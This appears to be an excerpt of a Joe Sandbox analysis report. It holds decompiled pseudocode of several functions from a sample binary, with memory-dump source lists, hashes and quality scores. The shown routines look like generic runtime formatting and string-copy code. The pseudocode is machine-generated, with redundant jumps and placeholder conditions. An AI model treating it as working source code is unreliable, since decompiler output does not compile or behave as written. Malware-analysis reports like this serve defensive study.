                                                                                                                                                                                                                                                        				_t83 =  *(__rcx + 0x28);
                                                                                                                                                                                                                                                        				_t125 =  *((intOrPtr*)(__rcx + 0x18));
                                                                                                                                                                                                                                                        				 *((long long*)(__rcx + 0x18)) = _t125 + 8;
                                                                                                                                                                                                                                                        				if ((_t83 >> 0x00000004 & 0x00000001) == 0) goto 0xe5ac1255;
                                                                                                                                                                                                                                                        				if ( *_t125 >= 0) goto 0xe5ac1255;
                                                                                                                                                                                                                                                        				 *(__rcx + 0x28) = _t83 | 0x00000040;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0xe5ac133f;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                                                                                                                                                                                                        				goto 0xe5ac1356;
                                                                                                                                                                                                                                                        				_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                                                                                                                                                                                        				 *((long long*)(__rcx + 0x18)) = _t126 + 8;
                                                                                                                                                                                                                                                        				if (( *(_t125 + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0xe5ac128e;
                                                                                                                                                                                                                                                        				goto 0xe5ac123e;
                                                                                                                                                                                                                                                        				goto 0xe5ac123e;
                                                                                                                                                                                                                                                        				_t127 =  *((intOrPtr*)(_t126 + 0x18));
                                                                                                                                                                                                                                                        				_t105 = dil &  *(_t126 + 0x28) >> 0x00000004;
                                                                                                                                                                                                                                                        				 *((long long*)(__rcx + 0x18)) = _t127 + 8;
                                                                                                                                                                                                                                                        				if (_t105 == 0) goto 0xe5ac12b7;
                                                                                                                                                                                                                                                        				goto 0xe5ac123e;
                                                                                                                                                                                                                                                        				goto 0xe5ac123e;
                                                                                                                                                                                                                                                        				r8d = r8d - 6;
                                                                                                                                                                                                                                                        				if (_t105 == 0) goto 0xe5ac1222;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t105 == 0) goto 0xe5ac1222;
                                                                                                                                                                                                                                                        				r8d = r8d - 2;
                                                                                                                                                                                                                                                        				if (_t105 == 0) goto 0xe5ac1222;
                                                                                                                                                                                                                                                        				goto 0xe5ac120e;
                                                                                                                                                                                                                                                        				_t117 =  *((intOrPtr*)(_t127 + 8));
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				 *((char*)(_t117 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t117 + 0x2c)) = 0x16;
                                                                                                                                                                                                                                                        				_v16 =  *((intOrPtr*)(_t127 + 8));
                                                                                                                                                                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9CE4( *((intOrPtr*)(_t127 + 8)), __rcx, _t127, _t132,  *_t127, __rbp, _t150);
                                                                                                                                                                                                                                                        				goto 0xe5ac13a8;
                                                                                                                                                                                                                                                        				_t128 =  *((intOrPtr*)(_t127 + 0x18));
                                                                                                                                                                                                                                                        				 *((long long*)(_t122 + 0x18)) = _t128 + 8;
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5ac1338;
                                                                                                                                                                                                                                                        				_t143 =  *_t128;
                                                                                                                                                                                                                                                        				goto 0xe5ac123e;
                                                                                                                                                                                                                                                        				goto 0xe5ac123e;
                                                                                                                                                                                                                                                        				 *(_t122 + 0x28) =  *(_t127 + 0x28) & 0xfffffff7;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABFDE0(_t122, _t122 + 0x50,  *((intOrPtr*)(_t122 + 0x30)), _t143,  *((intOrPtr*)(_t122 + 8)));
                                                                                                                                                                                                                                                        				if (_t143 != 0) goto 0xe5ac135f;
                                                                                                                                                                                                                                                        				 *(_t122 + 0x28) =  *(_t122 + 0x28) & 0xffffffdf;
                                                                                                                                                                                                                                                        				 *((char*)(_t122 + 0x4c)) = 0;
                                                                                                                                                                                                                                                        				r8b = bpl;
                                                                                                                                                                                                                                                        				if (_t152 != _t152) goto 0xe5ac1378;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC1BC0( *(_t127 + 0x28) & 0xfffffff7, _t122, _t143);
                                                                                                                                                                                                                                                        				goto 0xe5ac137f;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC1830( *_t128, _t122);
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5ac13a6;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t122 + 0x48)) == 0) goto 0xe5ac1398;
                                                                                                                                                                                                                                                        				if ( *((char*)( *((intOrPtr*)(_t122 + 0x40)))) == 0x30) goto 0xe5ac13a6;
                                                                                                                                                                                                                                                        				 *((long long*)(_t122 + 0x40)) =  *((long long*)(_t122 + 0x40)) - 1;
                                                                                                                                                                                                                                                        				 *((char*)( *((intOrPtr*)(_t122 + 0x40)))) = 0x30;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t122 + 0x48)) =  *((intOrPtr*)(_t122 + 0x48)) + 1;
                                                                                                                                                                                                                                                        				return 1;
                                                                                                                                                                                                                                                        			}





















                                                                                                                                                                                                                                                        0x7ff6e5ac11c0
                                                                                                                                                                                                                                                        0x7ff6e5ac11c3
                                                                                                                                                                                                                                                        0x7ff6e5ac11c7
                                                                                                                                                                                                                                                        0x7ff6e5ac11cb
                                                                                                                                                                                                                                                        0x7ff6e5ac11cf
                                                                                                                                                                                                                                                        0x7ff6e5ac11d3
                                                                                                                                                                                                                                                        0x7ff6e5ac11d9
                                                                                                                                                                                                                                                        0x7ff6e5ac11dd
                                                                                                                                                                                                                                                        0x7ff6e5ac11e0
                                                                                                                                                                                                                                                        0x7ff6e5ac11e3
                                                                                                                                                                                                                                                        0x7ff6e5ac11e9
                                                                                                                                                                                                                                                        0x7ff6e5ac11ed
                                                                                                                                                                                                                                                        0x7ff6e5ac11f3
                                                                                                                                                                                                                                                        0x7ff6e5ac11f5
                                                                                                                                                                                                                                                        0x7ff6e5ac11f8
                                                                                                                                                                                                                                                        0x7ff6e5ac11fe
                                                                                                                                                                                                                                                        0x7ff6e5ac1202
                                                                                                                                                                                                                                                        0x7ff6e5ac1208
                                                                                                                                                                                                                                                        0x7ff6e5ac120c
                                                                                                                                                                                                                                                        0x7ff6e5ac120e
                                                                                                                                                                                                                                                        0x7ff6e5ac1212
                                                                                                                                                                                                                                                        0x7ff6e5ac121c
                                                                                                                                                                                                                                                        0x7ff6e5ac1222
                                                                                                                                                                                                                                                        0x7ff6e5ac1228
                                                                                                                                                                                                                                                        0x7ff6e5ac1237
                                                                                                                                                                                                                                                        0x7ff6e5ac1245
                                                                                                                                                                                                                                                        0x7ff6e5ac124a
                                                                                                                                                                                                                                                        0x7ff6e5ac1252
                                                                                                                                                                                                                                                        0x7ff6e5ac1259
                                                                                                                                                                                                                                                        0x7ff6e5ac125f
                                                                                                                                                                                                                                                        0x7ff6e5ac1266
                                                                                                                                                                                                                                                        0x7ff6e5ac1273
                                                                                                                                                                                                                                                        0x7ff6e5ac1282
                                                                                                                                                                                                                                                        0x7ff6e5ac1286
                                                                                                                                                                                                                                                        0x7ff6e5ac128c
                                                                                                                                                                                                                                                        0x7ff6e5ac1291
                                                                                                                                                                                                                                                        0x7ff6e5ac129b
                                                                                                                                                                                                                                                        0x7ff6e5ac12a4
                                                                                                                                                                                                                                                        0x7ff6e5ac12ab
                                                                                                                                                                                                                                                        0x7ff6e5ac12af
                                                                                                                                                                                                                                                        0x7ff6e5ac12b5
                                                                                                                                                                                                                                                        0x7ff6e5ac12ba
                                                                                                                                                                                                                                                        0x7ff6e5ac12bc
                                                                                                                                                                                                                                                        0x7ff6e5ac12c0
                                                                                                                                                                                                                                                        0x7ff6e5ac12c6
                                                                                                                                                                                                                                                        0x7ff6e5ac12ca
                                                                                                                                                                                                                                                        0x7ff6e5ac12d0
                                                                                                                                                                                                                                                        0x7ff6e5ac12d4
                                                                                                                                                                                                                                                        0x7ff6e5ac12da
                                                                                                                                                                                                                                                        0x7ff6e5ac12df
                                                                                                                                                                                                                                                        0x7ff6e5ac12e3
                                                                                                                                                                                                                                                        0x7ff6e5ac12e6
                                                                                                                                                                                                                                                        0x7ff6e5ac12eb
                                                                                                                                                                                                                                                        0x7ff6e5ac12ef
                                                                                                                                                                                                                                                        0x7ff6e5ac12fc
                                                                                                                                                                                                                                                        0x7ff6e5ac1301
                                                                                                                                                                                                                                                        0x7ff6e5ac1307
                                                                                                                                                                                                                                                        0x7ff6e5ac130e
                                                                                                                                                                                                                                                        0x7ff6e5ac131b
                                                                                                                                                                                                                                                        0x7ff6e5ac132a
                                                                                                                                                                                                                                                        0x7ff6e5ac132e
                                                                                                                                                                                                                                                        0x7ff6e5ac1330
                                                                                                                                                                                                                                                        0x7ff6e5ac1333
                                                                                                                                                                                                                                                        0x7ff6e5ac133a
                                                                                                                                                                                                                                                        0x7ff6e5ac134a
                                                                                                                                                                                                                                                        0x7ff6e5ac1351
                                                                                                                                                                                                                                                        0x7ff6e5ac1359
                                                                                                                                                                                                                                                        0x7ff6e5ac135b
                                                                                                                                                                                                                                                        0x7ff6e5ac135f
                                                                                                                                                                                                                                                        0x7ff6e5ac1363
                                                                                                                                                                                                                                                        0x7ff6e5ac136c
                                                                                                                                                                                                                                                        0x7ff6e5ac1371
                                                                                                                                                                                                                                                        0x7ff6e5ac1376
                                                                                                                                                                                                                                                        0x7ff6e5ac137a
                                                                                                                                                                                                                                                        0x7ff6e5ac1387
                                                                                                                                                                                                                                                        0x7ff6e5ac138d
                                                                                                                                                                                                                                                        0x7ff6e5ac1396
                                                                                                                                                                                                                                                        0x7ff6e5ac1398
                                                                                                                                                                                                                                                        0x7ff6e5ac13a0
                                                                                                                                                                                                                                                        0x7ff6e5ac13a3
                                                                                                                                                                                                                                                        0x7ff6e5ac13c2

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 6b4a4146db3bd1fe649265067838c8b0d7c1a5e97031d62dd0eb31e0fdd0228e
                                                                                                                                                                                                                                                        • Instruction ID: b25f4d02c3dc1173cbd9f0784b77a88e82819c5fcb1feb8d786373e1fa4ecebf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6b4a4146db3bd1fe649265067838c8b0d7c1a5e97031d62dd0eb31e0fdd0228e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B251177BB18A5186E7648B2D806432827A1EF45F58F684131CE4EDB798CF3BEC52C745
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 70%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC09A0(void* __edx, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                                                                                        				long long _v16;
                                                                                                                                                                                                                                                        				signed long long _v24;
                                                                                                                                                                                                                                                        				signed int _t83;
                                                                                                                                                                                                                                                        				void* _t97;
                                                                                                                                                                                                                                                        				intOrPtr _t98;
                                                                                                                                                                                                                                                        				signed int _t105;
                                                                                                                                                                                                                                                        				void* _t113;
                                                                                                                                                                                                                                                        				intOrPtr _t117;
                                                                                                                                                                                                                                                        				void* _t122;
                                                                                                                                                                                                                                                        				intOrPtr* _t125;
                                                                                                                                                                                                                                                        				intOrPtr _t126;
                                                                                                                                                                                                                                                        				char* _t127;
                                                                                                                                                                                                                                                        				intOrPtr* _t128;
                                                                                                                                                                                                                                                        				void* _t132;
                                                                                                                                                                                                                                                        				intOrPtr _t143;
                                                                                                                                                                                                                                                        				void* _t147;
                                                                                                                                                                                                                                                        				void* _t150;
                                                                                                                                                                                                                                                        				void* _t152;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t113 = _t147;
                                                                                                                                                                                                                                                        				 *((long long*)(_t113 + 8)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t113 + 0x10)) = __rbp;
                                                                                                                                                                                                                                                        				 *((long long*)(_t113 + 0x18)) = __rsi;
                                                                                                                                                                                                                                                        				 *((long long*)(_t113 + 0x20)) = __rdi;
                                                                                                                                                                                                                                                        				_push(_t152);
                                                                                                                                                                                                                                                        				r8d =  *((intOrPtr*)(__rcx + 0x34));
                                                                                                                                                                                                                                                        				bpl = __edx;
                                                                                                                                                                                                                                                        				_t122 = __rcx;
                                                                                                                                                                                                                                                        				r14d = 8;
                                                                                                                                                                                                                                                        				_t97 = r8d - 5;
                                                                                                                                                                                                                                                        				if (_t97 > 0) goto 0xe5ac0a9c;
                                                                                                                                                                                                                                                        				if (_t97 == 0) goto 0xe5ac0a02;
                                                                                                                                                                                                                                                        				_t98 = r8d;
                                                                                                                                                                                                                                                        				if (_t98 == 0) goto 0xe5ac0af3;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t98 == 0) goto 0xe5ac0a73;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t98 == 0) goto 0xe5ac0a4b;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t98 == 0) goto 0xe5ac0af3;
                                                                                                                                                                                                                                                        				if (r8d != 1) goto 0xe5ac0abf;
                                                                                                                                                                                                                                                        				_t83 =  *(__rcx + 0x28);
                                                                                                                                                                                                                                                        				_t125 =  *((intOrPtr*)(__rcx + 0x18));
                                                                                                                                                                                                                                                        				 *((long long*)(__rcx + 0x18)) = _t125 + 8;
                                                                                                                                                                                                                                                        				if ((_t83 >> 0x00000004 & 0x00000001) == 0) goto 0xe5ac0a35;
                                                                                                                                                                                                                                                        				if ( *_t125 >= 0) goto 0xe5ac0a35;
                                                                                                                                                                                                                                                        				 *(__rcx + 0x28) = _t83 | 0x00000040;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0xe5ac0b1f;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                                                                                                                                                                                                        				goto 0xe5ac0b36;
                                                                                                                                                                                                                                                        				_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                                                                                                                                                                                                                                        				 *((long long*)(__rcx + 0x18)) = _t126 + 8;
                                                                                                                                                                                                                                                        				if (( *(_t125 + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0xe5ac0a6e;
                                                                                                                                                                                                                                                        				goto 0xe5ac0a1e;
                                                                                                                                                                                                                                                        				goto 0xe5ac0a1e;
                                                                                                                                                                                                                                                        				_t127 =  *((intOrPtr*)(_t126 + 0x18));
                                                                                                                                                                                                                                                        				_t105 = dil &  *(_t126 + 0x28) >> 0x00000004;
                                                                                                                                                                                                                                                        				 *((long long*)(__rcx + 0x18)) = _t127 + 8;
                                                                                                                                                                                                                                                        				if (_t105 == 0) goto 0xe5ac0a97;
                                                                                                                                                                                                                                                        				goto 0xe5ac0a1e;
                                                                                                                                                                                                                                                        				goto 0xe5ac0a1e;
                                                                                                                                                                                                                                                        				r8d = r8d - 6;
                                                                                                                                                                                                                                                        				if (_t105 == 0) goto 0xe5ac0a02;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t105 == 0) goto 0xe5ac0a02;
                                                                                                                                                                                                                                                        				r8d = r8d - 2;
                                                                                                                                                                                                                                                        				if (_t105 == 0) goto 0xe5ac0a02;
                                                                                                                                                                                                                                                        				goto 0xe5ac09ee;
                                                                                                                                                                                                                                                        				_t117 =  *((intOrPtr*)(_t127 + 8));
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				 *((char*)(_t117 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t117 + 0x2c)) = 0x16;
                                                                                                                                                                                                                                                        				_v16 =  *((intOrPtr*)(_t127 + 8));
                                                                                                                                                                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9CE4( *((intOrPtr*)(_t127 + 8)), __rcx, _t127, _t132,  *_t127, __rbp, _t150);
                                                                                                                                                                                                                                                        				goto 0xe5ac0b88;
                                                                                                                                                                                                                                                        				_t128 =  *((intOrPtr*)(_t127 + 0x18));
                                                                                                                                                                                                                                                        				 *((long long*)(_t122 + 0x18)) = _t128 + 8;
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5ac0b18;
                                                                                                                                                                                                                                                        				_t143 =  *_t128;
                                                                                                                                                                                                                                                        				goto 0xe5ac0a1e;
                                                                                                                                                                                                                                                        				goto 0xe5ac0a1e;
                                                                                                                                                                                                                                                        				 *(_t122 + 0x28) =  *(_t127 + 0x28) & 0xfffffff7;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABFDE0(_t122, _t122 + 0x50,  *((intOrPtr*)(_t122 + 0x30)), _t143,  *((intOrPtr*)(_t122 + 8)));
                                                                                                                                                                                                                                                        				if (_t143 != 0) goto 0xe5ac0b3f;
                                                                                                                                                                                                                                                        				 *(_t122 + 0x28) =  *(_t122 + 0x28) & 0xffffffdf;
                                                                                                                                                                                                                                                        				 *((char*)(_t122 + 0x4c)) = 0;
                                                                                                                                                                                                                                                        				r8b = bpl;
                                                                                                                                                                                                                                                        				if (_t152 != _t152) goto 0xe5ac0b58;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC1954( *(_t127 + 0x28) & 0xfffffff7, _t122, _t143);
                                                                                                                                                                                                                                                        				goto 0xe5ac0b5f;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC15D0( *_t128, _t122);
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5ac0b86;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t122 + 0x48)) == 0) goto 0xe5ac0b78;
                                                                                                                                                                                                                                                        				if ( *((char*)( *((intOrPtr*)(_t122 + 0x40)))) == 0x30) goto 0xe5ac0b86;
                                                                                                                                                                                                                                                        				 *((long long*)(_t122 + 0x40)) =  *((long long*)(_t122 + 0x40)) - 1;
                                                                                                                                                                                                                                                        				 *((char*)( *((intOrPtr*)(_t122 + 0x40)))) = 0x30;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t122 + 0x48)) =  *((intOrPtr*)(_t122 + 0x48)) + 1;
                                                                                                                                                                                                                                                        				return 1;
                                                                                                                                                                                                                                                        			}





















                                                                                                                                                                                                                                                        0x7ff6e5ac09a0
                                                                                                                                                                                                                                                        0x7ff6e5ac09a3
                                                                                                                                                                                                                                                        0x7ff6e5ac09a7
                                                                                                                                                                                                                                                        0x7ff6e5ac09ab
                                                                                                                                                                                                                                                        0x7ff6e5ac09af
                                                                                                                                                                                                                                                        0x7ff6e5ac09b3
                                                                                                                                                                                                                                                        0x7ff6e5ac09b9
                                                                                                                                                                                                                                                        0x7ff6e5ac09bd
                                                                                                                                                                                                                                                        0x7ff6e5ac09c0
                                                                                                                                                                                                                                                        0x7ff6e5ac09c3
                                                                                                                                                                                                                                                        0x7ff6e5ac09c9
                                                                                                                                                                                                                                                        0x7ff6e5ac09cd
                                                                                                                                                                                                                                                        0x7ff6e5ac09d3
                                                                                                                                                                                                                                                        0x7ff6e5ac09d5
                                                                                                                                                                                                                                                        0x7ff6e5ac09d8
                                                                                                                                                                                                                                                        0x7ff6e5ac09de
                                                                                                                                                                                                                                                        0x7ff6e5ac09e2
                                                                                                                                                                                                                                                        0x7ff6e5ac09e8
                                                                                                                                                                                                                                                        0x7ff6e5ac09ec
                                                                                                                                                                                                                                                        0x7ff6e5ac09ee
                                                                                                                                                                                                                                                        0x7ff6e5ac09f2
                                                                                                                                                                                                                                                        0x7ff6e5ac09fc
                                                                                                                                                                                                                                                        0x7ff6e5ac0a02
                                                                                                                                                                                                                                                        0x7ff6e5ac0a08
                                                                                                                                                                                                                                                        0x7ff6e5ac0a17
                                                                                                                                                                                                                                                        0x7ff6e5ac0a25
                                                                                                                                                                                                                                                        0x7ff6e5ac0a2a
                                                                                                                                                                                                                                                        0x7ff6e5ac0a32
                                                                                                                                                                                                                                                        0x7ff6e5ac0a39
                                                                                                                                                                                                                                                        0x7ff6e5ac0a3f
                                                                                                                                                                                                                                                        0x7ff6e5ac0a46
                                                                                                                                                                                                                                                        0x7ff6e5ac0a53
                                                                                                                                                                                                                                                        0x7ff6e5ac0a62
                                                                                                                                                                                                                                                        0x7ff6e5ac0a66
                                                                                                                                                                                                                                                        0x7ff6e5ac0a6c
                                                                                                                                                                                                                                                        0x7ff6e5ac0a71
                                                                                                                                                                                                                                                        0x7ff6e5ac0a7b
                                                                                                                                                                                                                                                        0x7ff6e5ac0a84
                                                                                                                                                                                                                                                        0x7ff6e5ac0a8b
                                                                                                                                                                                                                                                        0x7ff6e5ac0a8f
                                                                                                                                                                                                                                                        0x7ff6e5ac0a95
                                                                                                                                                                                                                                                        0x7ff6e5ac0a9a
                                                                                                                                                                                                                                                        0x7ff6e5ac0a9c
                                                                                                                                                                                                                                                        0x7ff6e5ac0aa0
                                                                                                                                                                                                                                                        0x7ff6e5ac0aa6
                                                                                                                                                                                                                                                        0x7ff6e5ac0aaa
                                                                                                                                                                                                                                                        0x7ff6e5ac0ab0
                                                                                                                                                                                                                                                        0x7ff6e5ac0ab4
                                                                                                                                                                                                                                                        0x7ff6e5ac0aba
                                                                                                                                                                                                                                                        0x7ff6e5ac0abf
                                                                                                                                                                                                                                                        0x7ff6e5ac0ac3
                                                                                                                                                                                                                                                        0x7ff6e5ac0ac6
                                                                                                                                                                                                                                                        0x7ff6e5ac0acb
                                                                                                                                                                                                                                                        0x7ff6e5ac0acf
                                                                                                                                                                                                                                                        0x7ff6e5ac0adc
                                                                                                                                                                                                                                                        0x7ff6e5ac0ae1
                                                                                                                                                                                                                                                        0x7ff6e5ac0ae7
                                                                                                                                                                                                                                                        0x7ff6e5ac0aee
                                                                                                                                                                                                                                                        0x7ff6e5ac0afb
                                                                                                                                                                                                                                                        0x7ff6e5ac0b0a
                                                                                                                                                                                                                                                        0x7ff6e5ac0b0e
                                                                                                                                                                                                                                                        0x7ff6e5ac0b10
                                                                                                                                                                                                                                                        0x7ff6e5ac0b13
                                                                                                                                                                                                                                                        0x7ff6e5ac0b1a
                                                                                                                                                                                                                                                        0x7ff6e5ac0b2a
                                                                                                                                                                                                                                                        0x7ff6e5ac0b31
                                                                                                                                                                                                                                                        0x7ff6e5ac0b39
                                                                                                                                                                                                                                                        0x7ff6e5ac0b3b
                                                                                                                                                                                                                                                        0x7ff6e5ac0b3f
                                                                                                                                                                                                                                                        0x7ff6e5ac0b43
                                                                                                                                                                                                                                                        0x7ff6e5ac0b4c
                                                                                                                                                                                                                                                        0x7ff6e5ac0b51
                                                                                                                                                                                                                                                        0x7ff6e5ac0b56
                                                                                                                                                                                                                                                        0x7ff6e5ac0b5a
                                                                                                                                                                                                                                                        0x7ff6e5ac0b67
                                                                                                                                                                                                                                                        0x7ff6e5ac0b6d
                                                                                                                                                                                                                                                        0x7ff6e5ac0b76
                                                                                                                                                                                                                                                        0x7ff6e5ac0b78
                                                                                                                                                                                                                                                        0x7ff6e5ac0b80
                                                                                                                                                                                                                                                        0x7ff6e5ac0b83
                                                                                                                                                                                                                                                        0x7ff6e5ac0ba2

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 876697f8e8f5cbbdb44752562e3cb115d809b93d1bac5633a342ac63b65505f1
                                                                                                                                                                                                                                                        • Instruction ID: 948c329be868678d188b51c45aef630571ab506e16117b8adc48b7e8bda94059
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 876697f8e8f5cbbdb44752562e3cb115d809b93d1bac5633a342ac63b65505f1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 68515837B19A9686E7248A2DD06032D27A0FF54F58F284131CA4DDB7A9DF2BEC42C745
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC4F50(signed int __ecx, signed int __edx, void* __eflags, intOrPtr* __rcx, intOrPtr* __rdx, void* __r8) {
                                                                                                                                                                                                                                                        				unsigned int _t13;
                                                                                                                                                                                                                                                        				unsigned int _t14;
                                                                                                                                                                                                                                                        				char _t15;
                                                                                                                                                                                                                                                        				char _t33;
                                                                                                                                                                                                                                                        				signed int* _t41;
                                                                                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				if (__eflags == 0) goto 0xe5ac500b;
                                                                                                                                                                                                                                                        				if ((__ecx & 0x00000007) == 0) goto 0xe5ac4f70;
                                                                                                                                                                                                                                                        				_t13 =  *((intOrPtr*)(__rcx));
                                                                                                                                                                                                                                                        				if (_t13 == 0) goto 0xe5ac4fe6;
                                                                                                                                                                                                                                                        				_t41 = __rcx + 1;
                                                                                                                                                                                                                                                        				if ((__ecx & 0x00000007) != 0) goto 0xe5ac4f61;
                                                                                                                                                                                                                                                        				if ((0x01010100 & ( *_t41 ^ 0xffffffff ^ 0xfefefeff +  *_t41)) == 0) goto 0xe5ac4f70;
                                                                                                                                                                                                                                                        				if (_t13 == 0) goto 0xe5ac4fe6;
                                                                                                                                                                                                                                                        				if (_t13 == 0) goto 0xe5ac4fe6;
                                                                                                                                                                                                                                                        				if (_t13 == 0) goto 0xe5ac4fe6;
                                                                                                                                                                                                                                                        				if (_t13 == 0) goto 0xe5ac4fe6;
                                                                                                                                                                                                                                                        				if (_t13 == 0) goto 0xe5ac4fe6;
                                                                                                                                                                                                                                                        				if (_t13 == 0) goto 0xe5ac4fe6;
                                                                                                                                                                                                                                                        				_t14 = _t13 >> 0x10;
                                                                                                                                                                                                                                                        				if (_t14 == 0) goto 0xe5ac4fe6;
                                                                                                                                                                                                                                                        				if (_t14 == 0) goto 0xe5ac4fe6;
                                                                                                                                                                                                                                                        				goto 0xe5ac4f70;
                                                                                                                                                                                                                                                        				_t52 =  &(_t41[2]) - 8 + 8 - __rdx;
                                                                                                                                                                                                                                                        				if ((__edx & 0x00000007) == 0) goto 0xe5ac5018;
                                                                                                                                                                                                                                                        				_t15 =  *((intOrPtr*)(__rdx));
                                                                                                                                                                                                                                                        				 *((char*)(__rdx + _t52)) = _t15;
                                                                                                                                                                                                                                                        				_t33 = _t15;
                                                                                                                                                                                                                                                        				if (_t33 == 0) goto 0xe5ac500b;
                                                                                                                                                                                                                                                        				if (_t33 == 0) goto 0xe5ac5006;
